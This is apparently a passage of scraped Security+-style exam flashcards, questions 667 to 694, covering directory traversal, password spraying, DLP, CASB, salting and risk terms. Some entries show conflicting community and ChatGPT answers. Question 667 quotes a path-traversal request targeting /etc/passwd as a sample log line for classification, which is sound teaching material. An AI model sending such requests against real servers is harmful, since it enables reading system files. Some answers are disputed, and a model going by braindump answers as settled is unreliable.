DES: Uses a key size of 56 bits. While historically significant, DES is now considered insecure for most applications due to its small key size, making it vulnerable to brute-force attacks.

Twofish: Supports key sizes up to 256 bits, making it more secure than DES.

RSA: A public-key encryption algorithm that typically uses key sizes of 1024 bits or larger for security, although smaller key sizes are also possible.

AES: Uses key sizes of 128, 192, or 256 bits. AES is widely used and considered secure for encrypting sensitive data.

Therefore, A. DES has the smallest key size among the algorithms listed.

667
Q

During an incident response, a security analyst observes the following log entry on the web server:

GET http://www.companysite.com/product_info.php?show=../../../../etc/passwd HTTP/1.1 Host: www.companysite.com

Which of the following BEST describes the type of attack the analyst is experiencing?

A. SQL injection
B. Cross-site scripting
C. Pass-the-hash
D. Directory traversal

A

D. Directory Traversal or Path Traversal.

Directory Traversal: This attack occurs when an attacker tries to access files and directories that are outside the web server's root directory. In this case, the URL http://www.companysite.com/product_info.php?show=../../../../etc/passwd suggests that the attacker is attempting to navigate up the directory structure (../../..) to reach sensitive files (/etc/passwd).

Here’s why the other options are not correct:

A. SQL injection: Involves injecting SQL queries through web application inputs to manipulate the database. The provided log entry does not show any SQL query manipulation.

B. Cross-site scripting (XSS): Involves injecting malicious scripts into web pages viewed by other users. The log entry does not indicate scripting or injecting content into a web page.

C. Pass-the-hash: Refers to techniques used in credential theft where an attacker captures hashed credentials and uses them to authenticate without knowing the original password. This log entry does not relate to credential passing.

Therefore, based on the log entry provided, the type of attack the analyst is experiencing is Directory Traversal (or Path Traversal).

668
Q

A security audit has revealed that a process control terminal is vulnerable to malicious users installing and executing software on the system. The terminal is beyond end-of-life support and cannot be upgraded, so it is placed on a protected network segment. Which of the following would be MOST effective to implement to further mitigate the reported vulnerability?

A. DNS sinkholing
B. DLP rules on the terminal
C. An IP blacklist
D. Application whitelisting

A

D. Application whitelisting.

Here’s why application whitelisting is the best choice:

Application Whitelisting: This approach allows only approved, known applications to run on the system. By explicitly listing and allowing only authorized software to execute, any attempt by malicious users to install and run unauthorized software would be blocked automatically. This is especially crucial for systems like process control terminals where maintaining a strict control over software execution is paramount for security.

Let’s briefly review the other options:

A. DNS sinkholing: DNS sinkholing is a technique used to redirect malicious domain queries to a controlled server. While useful for handling certain types of malicious activities, it does not directly prevent unauthorized software installation and execution on the terminal.

B. DLP (Data Loss Prevention) rules on the terminal: DLP rules focus on preventing sensitive data from leaving the network. While important for data protection, they do not address the core issue of unauthorized software installation and execution on the terminal.

C. An IP blacklist: IP blacklisting can block communication with known malicious IP addresses, but it does not prevent local software execution or installation on the terminal.

Therefore, D. Application whitelisting is the most effective measure to implement in this scenario to mitigate the risk posed by unauthorized software installation and execution on the vulnerable process control terminal.

669
Q

A document that appears to be malicious has been discovered in an email that was sent to a company’s Chief Financial Officer (CFO). Which of the following would be BEST to allow a security analyst to gather information and confirm it is a malicious document without executing any code it may contain?

A. Open the document on an air-gapped network.
B. View the document’s metadata for origin clues.
C. Search for matching file hashes on malware websites.
D. Detonate the document in an analysis sandbox.

A

Community : C 55%, D 25%, B 20%
Everyone can change the metadata of a file. B is wrong
“without executing any code it may contain” which means A and D is automatically wrong.
B wouldn’t tell you directly anything about the document
C if you compare the document with hashes and it matches with a known malware, then you know if it is a malware

ChatGPT and Braindump :
D. Detonate the document in an analysis sandbox.

Here’s why this option is the most suitable:

Analysis Sandbox: An analysis sandbox is a controlled environment designed to execute and observe the behavior of potentially malicious files or software in a safe manner. It isolates the document from the production environment, ensuring that any malicious activities it might attempt do not affect real systems. Security analysts can monitor the sandbox to observe the document's behavior, such as network connections it tries to establish, files it tries to access, or processes it attempts to start.

Let’s briefly review the other options:

A. Open the document on an air-gapped network: While an air-gapped network provides isolation from the internet, it does not provide the level of controlled analysis and observation that a dedicated analysis sandbox offers. Opening the document on an air-gapped network could still expose the network to potential risks.

B. View the document's metadata for origin clues: Examining metadata can provide some clues about the document's origin, but it does not confirm whether the document contains malicious code or what actions it might perform if opened.

C. Search for matching file hashes on malware websites: Checking file hashes on malware databases or websites can indicate if the document has been previously identified as malicious, but it does not provide real-time analysis or confirm the specific behavior of the document.

Therefore, D. Detonate the document in an analysis sandbox is the best option to safely gather information and confirm if the document is malicious without risking the security of the CFO’s computer or the company’s network.

670
Q

A security analyst has received an alert about PII being sent via email. The analyst’s Chief Information Security Officer (CISO) has made it clear that PII must be handled with extreme care. From which of the following did the alert MOST likely originate?

A. S/MIME
B. DLP
C. IMAP
D. HIDS

A

B. DLP (Data Loss Prevention).

Here’s why:

DLP (Data Loss Prevention): DLP solutions are designed to monitor and prevent sensitive data like PII from being sent outside the organization through various channels, including email. They can detect patterns or keywords that indicate the presence of sensitive information in emails and trigger alerts or take actions (such as blocking or quarantining the email) based on predefined policies.

S/MIME (Secure/Multipurpose Internet Mail Extensions): S/MIME is a standard for public key encryption and signing of MIME data. It enhances the security and authenticity of emails but does not specifically detect or prevent the transmission of PII.

IMAP (Internet Message Access Protocol): IMAP is a protocol used by email clients to retrieve messages from a mail server. It facilitates email access but is not directly related to monitoring or detecting PII in emails.

HIDS (Host-based Intrusion Detection System): HIDS monitors activities on individual hosts to detect suspicious behavior or signs of intrusion. While it may detect certain types of unauthorized access or actions on a host, it does not specifically monitor email content or PII transmission.

Therefore, considering the requirement to handle PII with extreme care and the nature of the alert about PII being sent via email, B. DLP (Data Loss Prevention) is the most likely source of the alert. DLP solutions are specifically designed to monitor and prevent the unauthorized transmission of sensitive data, such as PII, through email and other channels.

671
Q

A company has drafted an insider-threat policy that prohibits the use of external storage devices. Which of the following would BEST protect the company from data exfiltration via removable media?

A. Monitoring large data transfer transactions in the firewall logs
B. Developing mandatory training to educate employees about the removable media policy
C. Implementing a group policy to block user access to system files
D. Blocking removable-media devices and write capabilities using a host-based security tool

A

D. Blocking removable-media devices and write capabilities using a host-based security tool.

Here’s why this option is the best choice:

Blocking Removable-Media Devices: By using a host-based security tool, the company can enforce policies that block access to removable-media devices such as USB drives, external hard drives, and optical discs. Additionally, the tool can prevent unauthorized writing or copying of data to these devices. This approach directly addresses the insider-threat policy by physically preventing employees from using external storage devices to exfiltrate data.

Let’s briefly review the other options:

A. Monitoring large data transfer transactions in the firewall logs: While monitoring can detect unusual or large data transfers, it may not prevent data exfiltration via removable media if employees can bypass network-based controls by using physical storage devices.

B. Developing mandatory training to educate employees about the removable media policy: Training is important for policy awareness, but it relies on employee compliance and does not physically prevent data exfiltration via removable media.

C. Implementing a group policy to block user access to system files: This restricts access to system files but does not address the use of removable media directly.

Therefore, D. Blocking removable-media devices and write capabilities using a host-based security tool is the most effective measure to enforce the insider-threat policy and mitigate the risk of data exfiltration via external storage devices.

672
Q

After a ransomware attack, a forensics company needs to review a cryptocurrency transaction between the victim and the attacker. Which of the following will the company MOST likely review to trace this transaction?

A. The public ledger
B. The NetFlow data
C. A checksum
D. The event log

A

A. The public ledger.

Here’s why:

Public Ledger (Blockchain): Cryptocurrencies like Bitcoin and Ethereum use a decentralized public ledger (blockchain) that records all transactions. These transactions are transparent and can be accessed and audited by anyone. Each transaction includes details such as the amount transferred, sender's address, recipient's address, and timestamp. By reviewing the blockchain, the forensics company can trace the specific transaction associated with the ransom payment from the victim to the attacker.

Let’s briefly review the other options:

B. NetFlow data: NetFlow data provides information about network traffic flow and volume. While it can be useful for understanding network activity, it does not directly provide information about cryptocurrency transactions.

C. Checksum: A checksum is a hash value used to verify data integrity. It is not relevant for tracing cryptocurrency transactions.

D. Event log: Event logs typically record activities and events within a system or network. They may capture information related to the ransomware attack itself but do not provide details about cryptocurrency transactions.

Therefore, A. The public ledger (blockchain) is the correct answer as it provides the transparent and auditable record necessary to trace the cryptocurrency transaction involved in the ransom payment.

673
Q

A network administrator is setting up wireless access points in all the conference rooms and wants to authenticate devices using PKI. Which of the following should the administrator configure?

A. A captive portal
B. PSK
C. 802.1X
D. WPS

A

C. 802.1X

Here’s why 802.1X is the correct choice:

802.1X: This is an IEEE standard for network access control that provides port-based authentication using EAP (Extensible Authentication Protocol). It is commonly used for authenticating devices in enterprise networks, including wireless networks. With 802.1X, devices authenticate themselves to the network using digital certificates issued by a trusted Certificate Authority (CA) as part of a PKI infrastructure. This ensures strong authentication and secure access to the network.

Let’s briefly review the other options:

A. Captive portal: A captive portal is a web page that users must interact with before being granted access to the network. It typically requires users to enter credentials or accept terms of use, but it does not use PKI for device authentication.

B. PSK (Pre-Shared Key): PSK is a simpler authentication method where all devices share the same secret key. It does not involve PKI or certificate-based authentication.

D. WPS (Wi-Fi Protected Setup): WPS is a method for simplifying the process of connecting devices to a wireless network, often using a PIN or a button press. It does not provide PKI-based authentication.

Therefore, C. 802.1X is the appropriate choice for setting up wireless access points in conference rooms to authenticate devices using PKI, ensuring robust security and controlled access to the network.

674
Q

A security analyst is reviewing the following attack log output:

user comptia\john.smith attempted login with the password password123
user comptia\jane.doe attempted login with the password password123
user comptia\user.one attempted login with the password password123
user comptia\user.two attempted login with the password password123
user comptia\user.three attempted login with the password password123

user comptia\john.smith attempted login with the password password234
user comptia\jane.doe attempted login with the password password234
user comptia\user.one attempted login with the password password234
user comptia\user.two attempted login with the password password234
user comptia\user.three attempted login with the password password234

Which of the following types of attacks does this MOST likely represent?

A. Rainbow table
B. Brute-force
C. Password-spraying
D. Dictionary

A

C. Password-spraying.

Here’s why:

Password-spraying: In a password-spraying attack, attackers attempt to access multiple accounts using commonly used passwords or a small set of passwords across many accounts. This method avoids triggering automated account lockouts that may occur with traditional brute-force attacks, where multiple passwords are tried against a single account.

In the provided log:

Multiple users (john.smith, jane.doe, user.one, user.two, user.three) are attempting to log in with the same passwords ("password123" and "password234").
This pattern suggests that the attackers are trying these common passwords across multiple user accounts within the "comptia" domain.

Brute-force attack involves systematically trying all possible combinations of passwords until the correct one is found. This log does not show systematic attempts of different passwords but rather repetitive attempts with a small set of passwords.

Dictionary attack typically involves trying a list of commonly used passwords or words from a dictionary. Password-spraying is a form of dictionary attack where the same passwords are tried against multiple accounts, rather than trying many different passwords against one account.

Rainbow table attack involves precomputed hashes of passwords and is not evident from the log provided.

Therefore, based on the repeated attempts with common passwords across multiple accounts, C. Password-spraying is the most appropriate classification for the type of attack shown in the log.

675
Q

An organization has hired a security analyst to perform a penetration test. The analyst captures 1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for analysis. Which of the following tools should the analyst use to further review the pcap?

A. Nmap
B. cURL
C. Netcat
D. Wireshark

A

D. Wireshark.

Here’s why Wireshark is the appropriate choice:

Wireshark: Wireshark is a widely used network protocol analyzer that allows detailed inspection of captured network packets. It provides a graphical interface to interactively browse the pcap file, analyze network traffic, filter packets based on various criteria (e.g., source, destination, protocol), and extract valuable information such as payload contents, headers, and timestamps. It is specifically designed for in-depth packet analysis and is ideal for tasks like examining traffic patterns, identifying anomalies, and detecting potential security issues during penetration testing.

Let’s briefly review the other options:

A. Nmap: Nmap is a network scanning tool used for discovering hosts and services on a computer network. It is not designed for packet capture analysis like Wireshark.

B. cURL: cURL is a command-line tool for transferring data with URLs. It is used for making HTTP requests and does not analyze pcap files.

C. Netcat: Netcat (nc) is a versatile networking tool used for reading from and writing to network connections using TCP or UDP. It is not primarily used for pcap analysis.

Therefore, D. Wireshark is the correct tool for the security analyst to use to further review and analyze the pcap file captured during the penetration test.

676
Q

An organization that is located in a flood zone is MOST likely to document the concerns associated with the restoration of IT operations in a:

A. business continuity plan.
B. communications plan.
C. disaster recovery plan.
D. continuity of operations plan.

A

C. disaster recovery plan.

Here’s why:

Disaster Recovery Plan (DRP): A disaster recovery plan specifically outlines the procedures and strategies for recovering IT systems and infrastructure after a disruptive event, such as a flood. It includes detailed steps for restoring data, applications, hardware, and networks to minimize downtime and ensure business continuity. Given the potential impact of a flood on IT operations, including damage to hardware, data loss, and infrastructure disruption, a DRP is crucial for guiding the organization's response and recovery efforts.

While other plans like a business continuity plan (BCP) and continuity of operations plan (COOP) also play important roles in overall resilience and continuity planning, they may focus more broadly on organizational functions and operations beyond IT-specific considerations.

Therefore, C. disaster recovery plan is the plan where concerns associated with the restoration of IT operations in the event of a flood would typically be documented.

677
Q

Which of the following should a security administrator adhere to when setting up a new set of firewall rules?

A. Disaster recovery plan
B. Incident response procedure
C. Business continuity plan
D. Change management procedure

A

D. Change management procedure.

Here’s why:

Change Management Procedure: Change management procedures are protocols and guidelines that govern how changes to IT systems, including firewall configurations, are planned, tested, approved, implemented, and documented. Adhering to change management procedures ensures that firewall rule changes are carefully considered, properly authorized, and implemented without causing disruptions or introducing vulnerabilities into the network environment. It helps maintain the security and stability of the network by ensuring that changes are controlled and tracked.

While disaster recovery plans, incident response procedures, and business continuity plans are all critical aspects of overall security and operational resilience, they specifically focus on responding to and recovering from incidents and ensuring continuous business operations rather than directly governing the process of making changes to firewall rules.

Therefore, D. Change management procedure is the correct procedure for a security administrator to follow when setting up new firewall rules to ensure proper oversight, control, and documentation of changes.

678
Q

During an engagement, penetration testers left USB keys that contained specially crafted malware in the company’s parking lot. A couple days later, the malware contacted the command-and-control server, giving the penetration testers unauthorized access to the company endpoints. Which of the following will most likely be a recommendation in the engagement report?

A. Conduct an awareness campaign on the usage of removable media.
B. Issue a user guidance program focused on vishing campaigns.
C. Implement more complex password management practices.
D. Establish a procedure on identifying and reporting suspicious messages.

A

A. Conduct an awareness campaign on the usage of removable media.

Here’s why:

Awareness Campaign on Removable Media: The incident highlights a significant security risk posed by removable media (USB keys) that were left in the parking lot and subsequently used to introduce malware into the company's environment. An awareness campaign would educate employees about the risks associated with using untrusted or unknown removable media, such as USB drives found in public places. It would emphasize the importance of not inserting such devices into work computers and reporting them to IT/security personnel immediately.

Other Options Analysis:
    B. User Guidance Program on Vishing Campaigns: Vishing (voice phishing) typically involves social engineering via phone calls, not directly related to the USB drive incident.
    C. More Complex Password Management Practices: While important, complex password management alone wouldn't address the specific incident involving USB keys and malware.
    D. Procedure on Identifying and Reporting Suspicious Messages: This relates more to email and other message-based threats, not specifically to the introduction of malware via USB keys.

Therefore, A. Conduct an awareness campaign on the usage of removable media is the recommendation that directly addresses the incident and helps mitigate similar risks in the future by raising awareness among employees about the dangers of using untrusted removable media.

679
Q

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee’s COPE tablet and passed to the competitor via cloud storage.
Which of the following is the best mitigation strategy to prevent this from happening in the future?

A. User training
B. CASB
C. MDM
D. EDR

A

B. CASB (Cloud Access Security Broker).

Here’s why CASB is the most suitable option:

CASB (Cloud Access Security Broker): CASB solutions provide visibility and control over cloud applications and data. They can enforce policies regarding data sharing, access, and usage within cloud storage services. In this case, a CASB could have monitored and controlled the transfer of sensitive documents from the COPE tablet to unauthorized cloud storage services. CASBs can detect anomalies, enforce encryption, prevent unauthorized sharing, and provide auditing and logging capabilities to track data movements across cloud environments.

Other Options Analysis:
    A. User Training: While user training is important, it may not prevent deliberate or accidental data leaks via personal cloud storage if technical controls are lacking.
    C. MDM (Mobile Device Management): MDM focuses on managing mobile devices, including security and policy enforcement. However, it may not directly control data once it leaves the device and enters cloud storage.
    D. EDR (Endpoint Detection and Response): EDR is focused on detecting and responding to threats on endpoints. It may not provide direct control over data transferred to cloud services.

Therefore, B. CASB (Cloud Access Security Broker) is the best mitigation strategy in this scenario to prevent unauthorized data leaks via cloud storage by enforcing policies and monitoring data movements effectively.

680
Q

A manufacturing organization wants to control and monitor access from the internal business network to the segregated production network, while ensuring minimal exposure of the production network to devices. Which of the following solutions would best accomplish this goal?

A. Proxy server
B. NGFW
C. WAF
D. Jump server

A

D. Jump server
Reasoning:

Jump server:
    A jump server (also known as a jump box or bastion host) acts as a secure gateway between two networks. It allows controlled access to the production network from the internal business network by requiring users to first authenticate on the jump server before accessing any resources in the production network. This setup limits direct access to the production network, thereby minimizing its exposure to potential threats from the internal network. Additionally, a jump server can be configured to monitor and log all access and activities, providing an additional layer of security and auditability.

Evaluation of Other Options:

Proxy server:
    A proxy server can control and monitor access to certain services and websites by acting as an intermediary. However, it is generally not designed to provide the fine-grained access control and logging necessary for secure interactions between a business and a production network.

NGFW (Next-Generation Firewall):
    An NGFW can provide advanced security features like deep packet inspection, intrusion prevention, and application-level filtering. While it can control and monitor traffic between networks, it might be overkill and more complex than needed for this specific use case. NGFWs are typically used for broader network security purposes.

WAF (Web Application Firewall):
    A WAF is designed to protect web applications by filtering and monitoring HTTP/HTTPS traffic between a web application and the internet. It is not suitable for controlling and monitoring access between an internal business network and a segregated production network.

Conclusion:

A jump server (Option D) is specifically designed for controlling and monitoring access between different network segments, making it the best choice for securely managing access between an internal business network and a segregated production network with minimal exposure.

681
Q

Which of the following roles, according to the shared responsibility model, is responsible for securing the company’s database in an IaaS model for a cloud environment?

A. Client
B. Third-party vendor
C. Cloud provider
D. OBA

A

A. Client
Explanation:

Client:
    In an IaaS model, the cloud provider supplies the basic infrastructure, such as virtual machines, storage, and networks. The client (or customer) is responsible for managing and securing everything that runs on this infrastructure, including the operating systems, applications, and databases. This means the client is responsible for database security measures such as access control, encryption, patch management, and backup.

Evaluation of Other Options:

Third-party vendor:
    While third-party vendors can provide tools and services to help secure a database, the ultimate responsibility for securing the database lies with the client. The client must ensure that any third-party tools are properly configured and maintained.

Cloud provider:
    The cloud provider is responsible for the security of the underlying infrastructure, including the physical security of data centers, hardware, and the virtualization layer. They ensure the infrastructure is secure and available, but the responsibility for securing the data and applications on top of that infrastructure lies with the client.

OBA (Organization-Based Access):
    This is not a standard role in the shared responsibility model. The term might refer to a type of access control or policy, but it is not directly responsible for the overall security of a database.

Conclusion:

In an IaaS model, the client is responsible for securing the company’s database.

682
Q

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?

A. SCAP
B. NetFlow
C. Antivirus
D. DLP

A

D. DLP (Data Loss Prevention).

Here’s why:

DLP (Data Loss Prevention): DLP solutions are designed to monitor and control the movement of sensitive data within an organization. They can detect when sensitive information, such as PII, is being transmitted via email, web applications, or other channels. DLP solutions use policies to identify and prevent unauthorized transmission of sensitive data, including accidental leaks. They can inspect email content, attachments, and metadata to enforce security policies and prevent data breaches.

Other Options Analysis:
    A. SCAP (Security Content Automation Protocol): SCAP is a standardized framework for maintaining the security of enterprise systems. It includes specifications for security-related information, but it does not specifically focus on detecting or preventing accidental data leaks.
    B. NetFlow: NetFlow is a network protocol used for monitoring and collecting IP traffic information. While it can provide insights into network traffic patterns, it is not specifically designed for detecting or preventing data leaks.
    C. Antivirus: Antivirus software is designed to detect and remove malware from systems, but it does not have the capability to monitor or prevent accidental data leaks such as emailing PII.

Therefore, D. DLP (Data Loss Prevention) is the tool that organizations typically use to detect and prevent accidental transmission of sensitive data, such as PII, via email or other channels.

683
Q

A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following strategies is the bank requiring?

A. Encryption at rest
B. Masking
C. Data classification
D. Permission restrictions

A

A. Encryption at rest.

Here’s why:

Encryption at Rest: This strategy involves encrypting data when it is stored on devices such as laptops, desktops, servers, and storage systems. If a laptop is stolen, encrypted data remains protected because it cannot be accessed without the encryption key. This mitigates the risk of unauthorized access to sensitive information even if the physical device is compromised.

Other Options Analysis:
    B. Masking: Masking involves hiding part of the data to prevent sensitive information exposure, but it is typically used in non-production environments or specific use cases like data analytics, not for securing data on stolen laptops.
    C. Data Classification: Data classification involves categorizing data based on its sensitivity and applying appropriate security controls. While important for overall data management and security, it doesn't specifically address protection against data loss on stolen laptops.
    D. Permission Restrictions: This involves controlling access to data based on user roles and permissions, but it doesn't inherently protect data on stolen laptops unless combined with encryption or other security measures.

Therefore, the bank’s requirement for vendors to implement encryption at rest on laptops ensures that sensitive data remains protected even if the device is lost or stolen.

684
Q

After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate network.
Which of the following is the most appropriate to disable?

A. Console access
B. Routing protocols
C. VLANs
D. Web-based administration

A

D. Web-based administration
Explanation:

Web-based administration:
    Web-based administration interfaces are convenient but often come with significant security risks. They can be exploited if vulnerabilities are present, and they are frequently targeted by attackers. Disabling web-based administration reduces the attack surface and forces the use of more secure methods of router management, such as command-line interfaces (CLI) accessed via secure protocols like SSH.

Evaluation of Other Options:

Console access:
    Disabling console access is not recommended. Console access is crucial for managing and troubleshooting routers, especially if network issues prevent remote access. However, console access should be secured (e.g., with strong authentication methods and physical security measures).

Routing protocols:
    Routing protocols are essential for the router to perform its primary function of directing traffic. Disabling routing protocols would disrupt network operations. Instead, ensure routing protocols are configured securely (e.g., use authentication for routing updates).

VLANs:
    VLANs are a fundamental part of network segmentation and security. Disabling VLANs could lead to network segmentation issues and decreased security. Instead, ensure VLANs are configured correctly and securely.

Conclusion:

Disabling web-based administration is the most appropriate action to harden routers and reduce security vulnerabilities.

685
Q

A company requires hard drives to be securely wiped before sending decommissioned systems to recycling.
Which of the following best describes this policy?

A. Enumeration
B. Sanitization
C. Destruction
D. Inventory

A

B. Sanitization.

Sanitization refers to the process of removing data from storage devices such as hard drives, ensuring that the data cannot be retrieved using normal system functions or software tools. This process typically involves overwriting the entire storage space with random data or zeros multiple times to prevent any residual data from being recovered. Sanitization ensures that sensitive data is properly erased before the equipment is reused or recycled.

Enumeration refers to the process of listing or counting items, which is not directly related to securely wiping hard drives.
Destruction involves physically damaging or destroying the storage device to ensure data cannot be recovered, which is a more extreme measure compared to sanitization.
Inventory refers to keeping track of assets, which may include keeping records of decommissioned systems, but it does not directly relate to wiping hard drives.

Therefore, B. Sanitization is the best description of the policy where hard drives are wiped securely before recycling to ensure data security.

686
Q

An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following techniques is the attacker using?

A. Smishing
B. Phishing
C. Impersonating
D. Vishing

A

(Community : D 74%, C 26%)
While “C. Impersonating” is indeed part of the attacker’s actions, it’s a more generic term for assuming someone else’s identity. In this specific scenario, the attacker is using vishing (voice phishing) to impersonate the Chief Executive Officer (CEO) over the phone, which is a type of social engineering attack where the voice is used to manipulate the employee into buying gift cards. So, “D. Vishing” more accurately describes the specific technique being employed in this situation

(ChatGPT)
D. Vishing.

Vishing (voice phishing) is a type of social engineering attack where attackers use phone calls or voice communication to manipulate individuals into divulging sensitive information or performing actions such as transferring funds, providing access credentials, or purchasing items like gift cards. In this case, the attacker is impersonating the CEO over the phone to trick the employee into buying gift cards, which is a form of vishing attack.

To summarize the other terms related to phishing:

Phishing typically refers to fraudulent emails or messages (e.g., through email, SMS) that attempt to deceive individuals into revealing sensitive information or performing actions.
Smishing is a specific type of phishing that occurs through SMS (text messages) instead of email.
Impersonating refers more broadly to pretending to be someone else, which can apply to various forms of social engineering attacks, including phishing and vishing.

Therefore, in this scenario, the correct answer is D. Vishing, as it involves using voice communication to deceive the employee.

(Brain dump: C. Impersonating)

687
Q

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user’s intranet account? (Choose two.)

A. Federation
B. Identity proofing
C. Password complexity
D. Default password changes
E. Password manager
F. Open authentication

A

A. Federation
C. Password complexity

Federation (Option A) allows the company to manage single sign-on (SSO) across multiple applications or websites. When an employee logs into the intranet with their credentials, federation enables them to seamlessly access other company-owned websites or applications without needing separate logins. This simplifies access management and enhances user experience.

Password complexity (Option C) is enforced during the password creation process for the intranet account. It requires the password to be at least ten characters long, include numbers and letters, and have two special characters. This helps safeguard the intranet accounts by ensuring that passwords are sufficiently strong and resistant to common brute-force attacks.

Therefore, the company is using federation to enable single sign-on across multiple sites based on the intranet profile, and password complexity to strengthen the security of intranet accounts.

688
Q

Which of the following best describes a use case for a DNS sinkhole?

A. Attackers can see a DNS sinkhole as a highly valuable resource to identify a company’s domain structure.
B. A DNS sinkhole can be used to draw employees away from known-good websites to malicious ones owned by the attacker.
C. A DNS sinkhole can be used to capture traffic to known-malicious domains used by attackers.
D. A DNS sinkhole can be set up to attract potential attackers away from a company’s network resources.

A

C. A DNS sinkhole can be used to capture traffic to known-malicious domains used by attackers.

Explanation:
A DNS sinkhole is a technique used in cybersecurity to intercept and redirect specific domain name lookup requests (DNS queries) to a controlled server. The primary purpose of a DNS sinkhole is to capture and analyze traffic destined for known malicious domains. By redirecting DNS queries for these domains to a sinkhole server, security teams can monitor and block connections to malicious infrastructure, thereby preventing systems within the network from communicating with known threats.

Option A is incorrect because a DNS sinkhole is typically used to block or redirect traffic to known malicious domains, not to reveal domain structure to attackers.
Option B is incorrect because the purpose of a DNS sinkhole is not to lure employees to malicious websites but rather to prevent access to them.
Option D is incorrect because a DNS sinkhole is not set up to attract attackers away from a network; its purpose is defensive, to block or redirect traffic from known malicious sources.

Therefore, option C is the best description of a use case for a DNS sinkhole in cybersecurity.

689
Q

Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow table attack?

A. Digital signatures
B. Salting
C. Hashing
D. Perfect forward secrecy

A

B. Salting

Explanation:

Hashing (option C) is the process of converting plaintext passwords into a fixed-size string of characters using a mathematical algorithm. This is a crucial step in securely storing passwords.
Salting (option B) is an additional step where a unique, random value (the salt) is added to each password before hashing. This ensures that even if two users have the same password, their hashed values will be different due to the unique salt. Salting prevents the use of precomputed tables (like rainbow tables) because each password hash is effectively unique.
Digital signatures (option A) are used for verifying the authenticity and integrity of digital messages or documents, not for securing stored passwords.
Perfect forward secrecy (option D) is a property of certain key agreement protocols that ensures session keys are not compromised even if long-term keys are compromised. It is not directly related to password storage or protection.

Therefore, the reason why an attacker cannot easily decrypt passwords using a rainbow table attack is because of salting. Salting ensures that each password hash is unique, even if multiple users have the same password, thereby thwarting the effectiveness of precomputed hash tables like rainbow tables

690
Q

A company reduced the area utilized in its data center by creating virtual networking through automation and by creating provisioning routes and rules through scripting. Which of the following does this example describe?

A. IaC
B. MSSP
C. Containers
D. SaaS

A

A. IaC (Infrastructure as Code)

Explanation:

Infrastructure as Code (IaC) refers to the practice of managing and provisioning computing infrastructure through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. In the context of the given scenario:

Virtual networking through automation: This involves setting up and managing networking components (like virtual networks, subnets, routes) using scripts or automation tools rather than manually configuring them through console or UI.

Creating provisioning routes and rules through scripting: This indicates the automation of provisioning processes using scripts, which define how resources (such as virtual machines, storage, networking) are provisioned and configured.

These practices align with the principles of Infrastructure as Code, where infrastructure configurations are defined, managed, and automated through code or scripts. This approach provides benefits such as consistency, scalability, and agility in managing infrastructure resources.

Therefore, the scenario described in the question best fits under the concept of Infrastructure as Code (IaC).

691
Q

Historically, a company has had issues with users plugging in personally owned removable media devices into corporate computers. As a result, the threat of malware incidents is almost constant. Which of the following would best help prevent the malware from being installed on the computers?

A. AUP
B. NGFW
C. DLP
D. EDR

A

D. EDR (Endpoint Detection and Response)
Explanation:

EDR (Endpoint Detection and Response):
    EDR solutions provide continuous monitoring and response capabilities for endpoints. They can detect, investigate, and respond to potential security threats in real-time, including those introduced by removable media. EDR can help prevent malware from executing by detecting suspicious activity and automatically taking actions to mitigate threats.

Evaluation of Other Options:

A. AUP (Acceptable Use Policy):
    An AUP can define rules and expectations for acceptable use of corporate assets, including prohibiting the use of personal removable media. However, it relies on user compliance and does not provide a technical enforcement mechanism.

B. NGFW (Next-Generation Firewall):
    An NGFW can provide advanced network security features, including application awareness and control, but it may not be able to directly prevent malware from removable media being installed on endpoints. It is more effective at controlling network traffic rather than local endpoint activities.

C. DLP (Data Loss Prevention):
    DLP solutions focus on preventing sensitive data from leaving the organization and can monitor and control data transfers. While DLP can help manage data transfers to and from removable media, it is not primarily designed to prevent malware infections.

Conclusion:

Implementing EDR (Endpoint Detection and Response) is the best option to prevent malware from being installed on corporate computers due to personally owned removable media devices, as it provides real-time monitoring and response capabilities at the endpoint level.

692
Q

While investigating a recent security breach, an analyst finds that an attacker gained access by SQL injection through a company website. Which of the following should the analyst recommend to the website developers to prevent this from reoccurring?

A. Secure cookies
B. Input sanitization
C. Code signing
D. Blocklist

A

B. Input sanitization.

Explanation:

SQL injection is a type of attack where malicious SQL queries are inserted into input fields of a web application, exploiting vulnerabilities in the application’s code that improperly handles user input. Input sanitization is a process that ensures user input is filtered and validated before being processed by the application. This involves:

Filtering: Allowing only expected characters and patterns in user input.
Validation: Checking input against expected formats, such as ensuring numeric input is numeric and not malicious code.

By implementing rigorous input sanitization techniques, developers can significantly reduce the risk of SQL injection attacks. This approach ensures that any user-supplied data is treated as data rather than executable code, thereby preventing attackers from injecting SQL commands that manipulate the database.

Secure cookies (A) are used to protect session data in transit between the client and server, but they do not directly prevent SQL injection attacks.

Code signing (C) is used to verify the integrity and authenticity of software code, but it does not prevent SQL injection attacks.

Blocklist (D) approaches involve maintaining lists of known malicious inputs to block, but they are less effective than input sanitization because they can miss new or unknown attack patterns.

Therefore, B. Input sanitization is the most effective measure to recommend for preventing SQL injection attacks on the company website.

693
Q

Which of the following best describes the risk that is present once mitigations are applied?

A. Control risk
B. Residual risk
C. Inherent risk
D. Risk awareness

A

B. Residual risk best describes the risk that remains once mitigations are applied.

Explanation:

Control risk (A): This refers to the risk that a company's internal controls will fail to prevent or detect errors or fraud. It is not specifically related to the remaining risk after mitigations.
Residual risk (B): This is the risk that remains after all mitigation efforts and controls have been applied. It represents the remaining exposure that the organization must manage or accept.
Inherent risk (C): This is the level of risk that exists before any controls or mitigations are put in place. It reflects the natural level of risk present in a process or activity.
Risk awareness (D): This refers to the understanding and recognition of risks by the organization's stakeholders. It is a state of knowledge, not a type of risk.

Therefore, residual risk accurately represents the risk that persists after mitigations have been implemented.

694
Q

